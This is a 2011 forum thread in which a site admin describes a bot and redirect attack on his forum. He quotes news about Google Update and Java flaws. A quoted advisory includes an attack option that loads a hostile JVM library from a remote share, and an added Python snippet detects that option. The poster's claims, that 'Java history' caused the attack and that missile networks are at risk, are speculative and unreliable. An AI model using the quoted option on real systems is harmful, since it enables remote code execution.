The Air Force swears there was no panic. But for three-quarters of an hour Saturday morning, launch control officers at F.E. Warren Air Force Base in Wyoming couldn’t reliably communicate or monitor the status of 50 Minuteman III nuclear missiles. Gulp.

Backup security and communications systems, located elsewhere on the base, allowed the intercontinental ballistic missiles to be continually monitored. But the outage is considered serious enough that the very highest rungs on the chain of command — including the President — are being briefed on the incident today.

A single hardware failure appears to have been the root cause of the disruption, which snarled communications on the network that links the five launch control centers and 50 silos of the 319th Missile Squadron. Multiple error codes were reported, including “launch facility down.”

It was a “significant disruption of service,” an Air Force official familiar with the incident tells Danger Room. But not unprecedented: “Something similar happened before at other missile fields.”

A disruption of this magnitude, however, is considered an anomaly of anomalies.

“Over the course of 300 alerts — those are 24-hour shifts in the capsule — I saw this happen to three or four missiles, maybe,” says John Noonan, a former U.S. Air Force missile launch officer who first tweeted word of the issue. “This is 50 ICBMs dropping off at once. I never heard of anything like it.”

http://www.wired.com/dangerroom/2010/10/communications-dropped-to-50-nuke-missiles-in-icbm-snafu/

Okay so the Nukes are on the same grid?  :o We are DOOMED

So back to our little problems. I just needed to add this in to show that the big boys are having the same issues... and DON'T KNOW



Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 01:50:06 am
(http://www.thelivingmoon.com/forum/index.php/action=dlattach;attach=18;type=avatar) ellirium113

October 07, 2011, 06:16:05 PM

Author = Zorgon
Well looking at those two Google Updates
Google Update Task Machine Core
Google Update Task Machine UA
I would say I have found your new version of malware

Check this out:

http://omaha.googlecode.com/svn/wiki/GoogleUpdateOnAScheduleOverview.html (http://omaha.googlecode.com/svn/wiki/GoogleUpdateOnAScheduleOverview.html)

(http://img705.imageshack.us/img705/4697/coreupdateworkercrashha.jpg)

This is supposed to uninstall itself when there are no Google products being used...Chrome, Google Earth, Toolbar etc.

Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 01:52:10 am
Google Update Now a Scheduled Task, But Still Evil

(http://howto.wired.com/mediawiki/images/Cctv_improbulous.jpg)

By Scott Gilbertson

Quote
Google has released a slight revision of its Google Update software for Windows. The latest version eliminates the need for Update to run constantly in the background — one of several reasons we’ve previously labeled the software “evil” — but stops short of conforming to the best practices of software updating.

Instead of running constantly in the background, consuming resources and creating a potential security vulnerability, Google Update now runs as a scheduled task.

Google Update has also been changed to allow some control over when it runs. The default is for Update to check with Google’s servers once an hour, but if you dig into the Windows Task Scheduler you can change that interval and even disable it altogether. However, according to the Google Open Source Blog, tinkering with the update interval might cause Google Update to revert to its always-on status.

“When Google Update determines that the Windows Task Scheduler or Service mechanisms are not working as expected,” says the blog, “we have added in fallback mechanisms that cause Google Update to begin running as a continuous process again.”

So much for user control.

You might wonder what all the fuss is about. After all, what’s wrong with keeping your software up to date? Obviously, there’s nothing wrong with it, but Google’s Update software flies in the face of over 20 years of software best practices — there’s simply no need for desktop software to run update checks continuously, or even once an hour.

It’s not hard to see how Google views Update: it’s a way for it to have the constant update capabilities its web apps enjoy, but on your desktop. The problem is that while we accept that we can’t control the web, we most definitely can (and want to) control what happens on our laptops and PCs.

Or at least we could until Google decided we couldn’t.

The well-established practice of checking for updates when an application launches has been serving the industry — and some of its biggest names, like Adobe and Microsoft — well for decades.

The latest version of Google Update is a baby-step in the right direction, but we still won’t be using Chrome, Google Earth or anything else that relies on Google Update until Google does the right thing.

The Mac version of Google update remains unchanged.

http://www.webmonkey.com/2009/07/google_update_now_a_scheduled_task__but_still_evil/
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 03:32:27 am
Okay so caught up the events of the past few days...

JAVA ATTACKS

Couple days ago we got hacked big time. First by a swarm of what I assume were robots, by the speed and frequency of the attacks... But these were SMART bots... they got past captcha (we had a simple one at the time), REGISTERED an account and added weblinks to that account.  After the fact I set it to Admin approval and added three questions. That stopped them but I see in error logs that they are still knocking daily. It is this stopping them that IDed them as bots.

so looking up a couple IP addresses that we banned  like this one that just hit now over 6 times...

31.184.238.8  at this site...   http://www.stopforumspam.com/search.php

yields over 500 aliases for that IP. You can search that site using a user name, an IP or an email

Well then yesterday we got all our users getting the redirects, false links, virus warnings etc.. all different depending on the browser used, the anti virus program etc... I posted some of the screen captures.

Called up my server to fix the issue... they found some JAVA scripts had gotten in. So we reloaded a saved database and tried again.  No help access still messed up, but stopped the alerts.

We tried getting access but would get blank pages. Russo spotted a 2 in the address and changed it to a 1 and bang he was in. So there was a script adding and subtracting numbers to the commands

We were up late trying to figure out what was going on and on one screen I saw at the bottom notifications on mouse over... "java history (-1)"  So something in the java folder was causing this.
Now I run several cleaners like CC Cleaner to get cookies etc out. I DID NOT know until last night that it doesn't clean out JAVA

At this point I didn't know that yet... we were tired so I moved the forum to a temp folder and got some sleep. Next morning I uploaded my copy of the forum to the server... hoping that would get me a fresh starting point... same login issues  WTF? How can that be?  fresh upload should have worked.  Server techs figured the database must be corrupt...


Then I loaded up IE ( I NEVER do that :P ) and found I could log in... but since my firefox still had me locked in, I couldn't do anything... so okay this HAS to be some hidden cookie issue but there were NONE in IE or FF cleaned them all out, etc... ran everything I had, checked my security into computer everything was fine..

Okay so no go... I then remembered the JAVA history issue and googled it;

"clearing java history"  and got right away to this PDF

How to Delete Browsing History from Java (https://portals.usw.edu/estudent/documents/BBStudentGuide/HowtoDeleteBrowsingHistory.pdf)

It was from that file I got the instructions I posted at the top. Other operating systems are in the file.

I deleted the history... tried again and everything worked.  The forum was now intact (save the front portal due to database restore) Log in worked no more alerts NOTHING. Told the other admins  they cleared the history and voila  all good.

So far it's been error free for over 24 hours, though the bots are hammering away.

Okay so how does all this tie together?

It SEEMS that what is happening is that a java script lurks outside the front door somehow... I am no expert, just an observer. It then SEEMS to attach itself to a user logging in to a forum. So you go visit say ATS and this script sticks to your browser like a burr... then you visit other forums and it hitch hikes.

So YOU the user think the forum you are visiting is giving you a virus, redirect or other alert... and the forum owners can't find it (one found one is an ad  coincidence I think). Well they can't find it because it's not INSIDE, it's lurking when you log in, especially with IE users.

And the forum owners are saying 'It's not us... it's your browser doing it.' Well in a sense that is true. It is coming via the browser, by a parasite riding along.

So conspiracy people will get all up in arms, blame the operators, blame the PTB, the three letter clubs etc. But then I see that report that Area 51 Swarm Control is having the SAME nuisance attacks and false positives... and THEY don't know what is going on... then I know it's not the PTB doing this.

If I could reach them ( I will try) I would suggest they look at the JAVA issue, because even the secret servers and networks operate using JAVA. I cannot say for sure that their problem is the same, but if I were them I would look at that.

Once I cleaned the JAVA history... my PC and the forum are moving faster  a LOT faster. I had a lag before... its now gone... was likely the cookies in the browser doing it. I don't know but can see the results
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 03:54:27 am
So then we looked back on the web for JAVA issues and BTS found this

Serious New Java Flaw Affects All Current Versions of Windows (http://threatpost.com/en_us/blogs/serious-new-java-flaw-affects-all-current-versions-windows-040910)

April 9, 2010, 9:37AM

Quote
There is a serious vulnerability in Java that leaves users running any of the current versions of Windows open to simple Web-based attacks that could lead to a complete compromise of the affected system. Two separate researchers released information on the vulnerability on Friday, saying that it has been present in Java for years.

Quote
In short, if you have a recent version of Java running on a Windows machine, you're affected by this flaw.

"Java.exe and javaw.exe support an undocumented-hidden command-line parameter "-XXaltjvm" and curiosly also "-J-XXaltjvm" (see -J switch in javaws.exe). This instructs Java to load an alternative JavaVM library (jvm.dll or libjvm.so) from the desired path. Game over. We can set -XXaltjvm=\\IP\evil , in this way javaw.exe will load our evil jvm.dll. Bye bye ASLR, DEP...," Santamarta said in his advisory.

Because the JavaWS technology is included in the Java Runtime Environment, which is used by all of the major browsers, the vulnerability affects all of these applications, including Firefox, Internet Explorer and Chrome, on all versions of Windows from 2000 through Windows 7, Santamarta said. Browsers running on Apple's Mac OS X are not vulnerable.

Serious New Java Flaw Affects All Current Versions of Windows (http://threatpost.com/en_us/blogs/serious-new-java-flaw-affects-all-current-versions-windows-040910)

JavaWS and Javaws.exe



Quote
In his advisory, Ormandy said that he notified Sun about the vulnerability but that the vendor didn't believe it was serious enough to warrant an emergency patch.

"The toolkit provides only minimal validation of the URL parameter, allowing us to pass arbitrary parameters to the javaws utility, which provides enough functionality via command line arguments to allow this error to be exploited. The simplicity with which this error can be discovered has convinced me that releasing this document is in the best interest of everyone except the vendor," Ormandy said.

The workaround for this problem is to disable JavaWS and Javaws.exe, Santamarta said in his advisory. Ormandy has set up a proof-of-concept URL, included in his advisory, that demonstrates the exploit.

Julien Tinnes has more information about this class of Java vulnerability.

Javacalypse (http://blog.cr0.org/2010/04/javacalypse.html)

Quote
EDIT: Following its full disclosure Sun fixed Tavis' Java deployment toolkit bug (CVE-2010-0886 and CVE-2010-0887) in a matter of days, wow! No doubts this will be used in the future as an argument for full disclosure.
However, this does not bring much security! An attacker can still automatically downgrade your version of Java (using installJRE) and exploit this bug or any other he likes!

Almost one year ago, I blogged about one of my favorite security bugs, found by Sami Koivu.

More specifically, I blogged about a class of Java bugs exposed by Sami Koivu and I mentioned this was the first instance of it.


So I repeat... CLEAN OUT YOUR JAVA HISTORY NOW
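
Added example (not part of the original post or of the advisories it quotes): the `-XXaltjvm` and `-J-XXaltjvm` launcher options named in the quoted advisory show up in process-creation logs, so they can be searched for. The sample command lines are constructed, and the function names are hypothetical.

```python
import re

# Launchers named in the quoted advisory; Windows file names are case-insensitive.
JAVA_LAUNCHERS = {"java.exe", "javaw.exe", "javaws.exe"}

# -XXaltjvm=<path>, optionally behind the -J pass-through prefix used with javaws.
ALTJVM_RE = re.compile(r'(?:^|[\s"])(?P<opt>(?:-J)?-XXaltjvm)=(?P<path>"[^"]*"|[^\s"]+)')

# Constructed process-creation command lines (not taken from any real system).
SAMPLE_EVENTS = [
    r'"C:\Program Files\Java\jre6\bin\javaw.exe" -jar C:\apps\report.jar',
    r'"C:\Program Files\Java\jre6\bin\javaws.exe" -J-XXaltjvm=\\192.0.2.10\share http://example.invalid/app.jnlp',
    r'C:\Java\bin\java.exe -XXaltjvm=C:\Users\Public\jvm -version',
    r'C:\Windows\notepad.exe C:\notes\-XXaltjvm=readme.txt',
]


def image_name(cmdline):
    """Return the lower-cased base name of the executable in a Windows command line."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        exe = cmdline[1:].split('"', 1)[0]
    else:
        exe = cmdline.split(None, 1)[0] if cmdline else ""
    return re.split(r'[\\/]', exe)[-1].lower()


def check_command_line(cmdline):
    """Return a finding if a Java launcher is told to load an alternative JVM, else None."""
    image = image_name(cmdline)
    if image not in JAVA_LAUNCHERS:
        return None  # only the Java launchers interpret this option
    match = ALTJVM_RE.search(cmdline)
    if not match:
        return None
    path = match.group("path").strip('"')
    remote = path.startswith("\\\\") or path.startswith("//")
    return {
        "image": image,
        "option": match.group("opt"),
        "path": path,
        "remote": remote,
        # A JVM library loaded from a network share is the case the advisory describes.
        "severity": "high" if remote else "medium",
    }


def scan(lines):
    """Return (line_number, finding) pairs for every flagged command line."""
    findings = []
    for number, line in enumerate(lines, 1):
        finding = check_command_line(line)
        if finding:
            findings.append((number, finding))
    return findings


if __name__ == "__main__":
    for number, finding in scan(SAMPLE_EVENTS):
        print(number, finding["severity"], finding["image"], finding["option"], finding["path"])
```
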


Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 03:58:12 am
The previous information has been provided by a lot of blood and sweat..

If you find any of it useful to save your butt, please donate to the cause...

as soon as I figure out how to put the dang Buttons back in  :P

 ::)

 8)

Stay tuned for additional updates. I don't know yet if we are out of hot water but my server team is working on beefing up security (they better be for what they charge :P )


PS To any spooks listening in... please relay this to the appropriate commands and have them check for this
Title: Re: Internet Wars and Java Attacks
Post by: Dood on October 08, 2011, 04:38:51 am
I cleaned out mine.  Not at all difficult either...
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 04:58:21 am
Great to see you made it in. I was watching the error logs and saw your repeated attempts using a history file. Figured I better email you :D

Now I can get some sleep... its been quiet for over 24 hours and the bots are still pounding at the door. So I will save another backup now and get some rest
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 02:45:18 pm
Update: Reply from ATS

This really, REALLY sounds like something picked up via an email or blackhat site that waits until you try to log into another site (any log in could trigger it) and launches a key-logger in the hope of getting log in information.

Usually all these type are really interested in is financial account log ins.

Thanks for the heads up, I'm letting Bill know just in case.

mark...